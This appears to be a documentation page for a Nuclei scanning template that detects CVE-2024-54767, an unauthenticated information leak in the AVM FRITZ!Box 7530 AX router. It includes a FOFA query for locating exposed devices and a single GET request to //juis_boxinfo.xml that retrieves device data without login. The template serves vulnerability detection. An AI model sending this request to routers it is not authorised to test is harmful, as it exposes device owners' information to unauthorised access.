AVM FRITZ!Box 7530 AX - Unauthorized Access
ID: CVE-2024-54767
Severity: high
Author: DhiyaneshDK
Tags: cve,cve2024,fritz!box,info-leak,unauth
Description
Section titled “Description”An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication.
YAML Source
Section titled “YAML Source”id: CVE-2024-54767
info: name: AVM FRITZ!Box 7530 AX - Unauthorized Access author: DhiyaneshDK severity: high description: | An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication. reference: - https://github.com/Shuanunio/CVE_Requests/blob/main/AVM/fritz/AVM_FRITZ%21Box_7530%20AX_unauthorized_access_vulnerability_first.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-54767 cwe-id: CWE-203 epss-score: 0.00043 epss-percentile: 0.1187 metadata: verified: true max-request: 1 fofa-query: body="FRITZ!Box 7530" tags: cve,cve2024,fritz!box,info-leak,unauth
http: - raw: - | GET //juis_boxinfo.xml HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "<e:BoxInfo"
- type: word part: content_type words: - "text/xml"
- type: status status: - 200# digest: 490a0046304402201dbe8caed23426896aa289454271cd60ef12bb924c9c46c9742ed32a65af9afc02200a2e83caad4e6630af7c7322643cc9b34af43e38df1bd15a0fb585312788f0d2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-54767.yaml"